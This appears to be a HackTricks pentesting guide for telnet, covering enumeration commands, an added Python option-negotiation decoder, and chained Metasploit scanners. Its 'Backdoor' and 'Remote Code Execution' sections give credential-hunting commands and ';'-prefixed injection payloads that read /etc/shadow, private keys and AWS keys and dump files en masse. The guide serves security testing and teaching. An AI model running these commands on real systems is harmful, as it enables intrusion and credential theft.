hacktricks/network-services-pentesting/pentesting-telnet.md


## **Basic Information**
Telnet is a network protocol that gives users an INSECURE way to access a computer over a network: everything, credentials included, travels in cleartext.
**Default port:** 23
```
23/tcp open telnet
```
## Enumeration
### Banner Grabbing
```bash
nc -vn <IP> 23
```
All the interesting enumeration can be performed with **nmap**:
```bash
nmap -n -sV -Pn --script "*telnet* and safe" -p 23 <IP>
```
The `telnet-ntlm-info.nse` script will obtain NTLM information (Windows versions).
In the TELNET protocol there are various "**options**" that are sanctioned and may be used with the "**DO, DON'T, WILL, WON'T**" structure to allow a user and server to agree to use a more elaborate (or perhaps just different) set of conventions for their TELNET connection. Such options could include changing the character set, the echo mode, etc. (From the [telnet RFC](https://tools.ietf.org/html/rfc854))\
**I know it is possible to enumerate these options but I don't know how, so let me know if you know how.**
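As an added example (not part of the HackTricks page), the following Python script decodes the DO/DON'T/WILL/WON'T negotiation a telnet server sends when you connect, which is one way to enumerate the options mentioned above; `probe()`, `parse_negotiation()` and the option-name table are this example's own, and the sample greeting is constructed rather than captured.

```python
import socket

# RFC 854 command bytes
IAC, DONT, DO, WONT, WILL, SB, SE = 255, 254, 253, 252, 251, 250, 240
VERBS = {DO: "DO", DONT: "DONT", WILL: "WILL", WONT: "WONT"}
# Option codes from the telnet option RFCs (subset; unknown codes are reported numerically)
OPTIONS = {0: "BINARY", 1: "ECHO", 3: "SUPPRESS-GO-AHEAD", 5: "STATUS", 24: "TERMINAL-TYPE",
           31: "NAWS", 32: "TERMINAL-SPEED", 34: "LINEMODE", 37: "AUTHENTICATION",
           38: "ENCRYPT", 39: "NEW-ENVIRON"}

def parse_negotiation(data: bytes):
    """Split a raw telnet stream into ([(verb, option), ...], plain_text)."""
    negotiations, text, i = [], bytearray(), 0
    while i < len(data):
        if data[i] != IAC:                          # ordinary data byte
            text.append(data[i])
            i += 1
        elif i + 1 >= len(data):                    # dangling IAC at end of buffer
            break
        elif data[i + 1] == IAC:                    # IAC IAC: escaped 0xFF data byte
            text.append(IAC)
            i += 2
        elif data[i + 1] in VERBS:                  # DO/DONT/WILL/WONT <option>
            if i + 2 >= len(data):
                break                               # verb without its option byte
            negotiations.append((VERBS[data[i + 1]], OPTIONS.get(data[i + 2], str(data[i + 2]))))
            i += 3
        elif data[i + 1] == SB:                     # subnegotiation: skip to IAC SE
            end = data.find(bytes([IAC, SE]), i + 2)
            i = len(data) if end < 0 else end + 2
        else:                                       # other two-byte commands (NOP, GA, ...)
            i += 2
    return negotiations, text.decode("latin-1")

def probe(host: str, port: int = 23, timeout: float = 3.0):
    """Connect, collect what the server sends until it goes quiet, and decode it."""
    buf = b""
    with socket.create_connection((host, port), timeout=timeout) as s:
        try:
            while chunk := s.recv(4096):
                buf += chunk
        except socket.timeout:
            pass                                    # no more data: we have the greeting
    return parse_negotiation(buf)

# Constructed sample of a typical Linux telnetd greeting (not captured from a real host)
SAMPLE = bytes([IAC, DO, 24, IAC, DO, 32, IAC, DO, 39, IAC, WILL, 1, IAC, WILL, 3]) + b"login: "
```

`probe("<IP>")` returns the decoded greeting; a server answering `WILL ECHO` and `WILL SUPPRESS-GO-AHEAD` before the `login:` prompt is the usual character-at-a-time setup, and anything it offers under `AUTHENTICATION` or `ENCRYPT` is worth noting since plain telnet has neither.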
### [Brute force](../generic-methodologies-and-resources/brute-force.md#telnet)
## Config file
```bash
/etc/inetd.conf
/etc/xinetd.d/telnet
/etc/xinetd.d/stelnet
```
## HackTricks Automatic Commands
### Telnet
#### Banner Grabbing
##### Using Nmap
```bash
nmap -sV --script=banner -p <port> <ip>
```
##### Using Telnet
```bash
telnet <ip> <port>
```
#### Authentication Bypass
##### Null Session
```bash
telnet <ip> <port>
```
```bash
GET / HTTP/1.0
```
##### Backdoor
```bash
telnet <ip> <port>
```
```bash
# Host survey, one command per section (repeated grep searches dropped, find precedence fixed)
section() { echo ""; echo "$1: "; }
id; uname -a; w
section "Distributor ID"; cat /etc/*-release
section "Kernel"; uname -a
section "Uptime"; uptime
section "Processes"; ps auxf --width 200
section "Logged In"; who
section "Home Directories"; ls -ahl /home
section "Private SSH Keys"; find / -name 'id_rsa*' 2>/dev/null
section "Sudoers"; cat /etc/sudoers 2>/dev/null
section "Cron Jobs"; ls -ahl /etc/cron* 2>/dev/null
section "Listening Ports"; netstat -antup 2>/dev/null
section "Established Connections"; netstat -anp 2>/dev/null | grep ESTABLISHED
section "ARP Cache"; arp -a
section "DNS Servers"; cat /etc/resolv.conf
section "Routing Table"; route
section "Firewall Rules"; iptables -L
section "Hostname"; hostname
section "Network Configuration"; ifconfig -a
section "Available Interfaces"; ls /sys/class/net
section "Default Route"; ip route show
section "All Users"; cat /etc/passwd
section "All Groups"; cat /etc/group
section "All Shells"; cat /etc/shells
section "All Services"; ls /etc/init.d/
section "All Applications"; ls /usr/share/applications/
section "All Binaries"; ls /usr/bin/
section "All SUID Binaries"; find / -perm -4000 -type f 2>/dev/null
section "All SGID Binaries"; find / -perm -2000 -type f 2>/dev/null
section "All World Writable Directories"; find / -perm -2 -type d 2>/dev/null
section "All World Writable Files"; find / -perm -2 -type f 2>/dev/null
section "All Directories with Sticky Bit"; find / -perm -1000 -type d 2>/dev/null
# lsattr flag field is the first word; match an 'i' inside it, not in the path
section "All Files with Immutable Bit"; lsattr -aR 2>/dev/null | grep -E '^\S*i\S* '
section "All Files with No Owner"; find / -xdev \( -nouser -o -nogroup \) -print 2>/dev/null
section "All Files Not World Accessible"; find / -xdev \( -type f -o -type d \) ! -perm /o=rwx -print 2>/dev/null
# parentheses needed: without them -type f -exec applied only to the -2007 branch
section "All Files with SUID/SGID and World Writable"; find / \( -perm -4007 -o -perm -2007 \) -type f -exec ls -la {} \; 2>/dev/null
section "All Hidden Files"; find / -name ".*" -ls 2>/dev/null
section "All Files with Passwords"; grep -Rl password / 2>/dev/null
section "All Files with RSA Private Keys"; grep -Rl "BEGIN RSA PRIVATE KEY" / 2>/dev/null
section "All Files with AWS Keys"; grep -Rl "AKIA" / 2>/dev/null
section "All Files with Encrypted Private Keys"; grep -Rl "BEGIN ENCRYPTED PRIVATE KEY" / 2>/dev/null
section "All Files with OpenSSH Private Keys"; grep -Rl "BEGIN OPENSSH PRIVATE KEY" / 2>/dev/null
section "All Files with Certificates"; grep -Rl "BEGIN CERTIFICATE" / 2>/dev/null
section "All Files with PKCS#8 Private Keys"; grep -Rl "BEGIN PRIVATE KEY" / 2>/dev/null
section "All Files with PKCS12 Markers"; grep -Rl "BEGIN PKCS12" / 2>/dev/null
section "All Files with PKCS7 Markers"; grep -Rl "BEGIN PKCS7" / 2>/dev/null
section "All Files with Java Keystore Markers"; grep -Rl "BEGIN JAVA KEYSTORE" / 2>/dev/null
```
##### Remote Code Execution
```bash
telnet <ip> <port>
```
```bash
;id
;uname -a
;cat /etc/passwd
;cat /etc/shadow
;ls -ahl /home
;ls -ahl /root
# one find per extension; the glob is quoted so the remote shell, not the local one, expands it
;for ext in bak log conf config ini xml json yml yaml db sql py pyc pyo php php3 php4 php5 phtml inc pl pm cgi rb sh bash ps1 psm1 psd1 psc1 psc2 java class jar war ear jsp jspx swf fla as aspx ascx cs csproj vb vbproj dll exe bat cmd vbs vbe js jse wsf wsc; do find / -name "*.$ext" -type f -exec cat {} \; 2>/dev/null; done
```
```
Protocol_Name: Telnet          #Protocol Abbreviation if there is one.
Port_Number: 23                #Comma separated if there is more than one.
Protocol_Description: Telnet   #Protocol Abbreviation Spelled out

Entry_1:
  Name: Notes
  Description: Notes for Telnet
  Note: |
    wireshark to see creds being passed (display filter):
    tcp.port == 23 and ip.addr != myip

    https://book.hacktricks.xyz/pentesting/pentesting-telnet

Entry_2:
  Name: Banner Grab
  Description: Grab Telnet Banner
  Command: nc -vn {IP} 23

Entry_3:
  Name: Nmap with scripts
  Description: Run nmap scripts for telnet
  Command: nmap -n -sV -Pn --script "*telnet*" -p 23 {IP}

Entry_4:
  Name: consoleless msf enumeration
  Description: Telnet enumeration without the need to run msfconsole
  Note: sourced from https://github.com/carlospolop/legion
  Command: msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_version; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/brocade_enable_login; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_encrypt_overflow; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_ruggedcom; set RHOSTS {IP}; set RPORT 23; run; exit'
```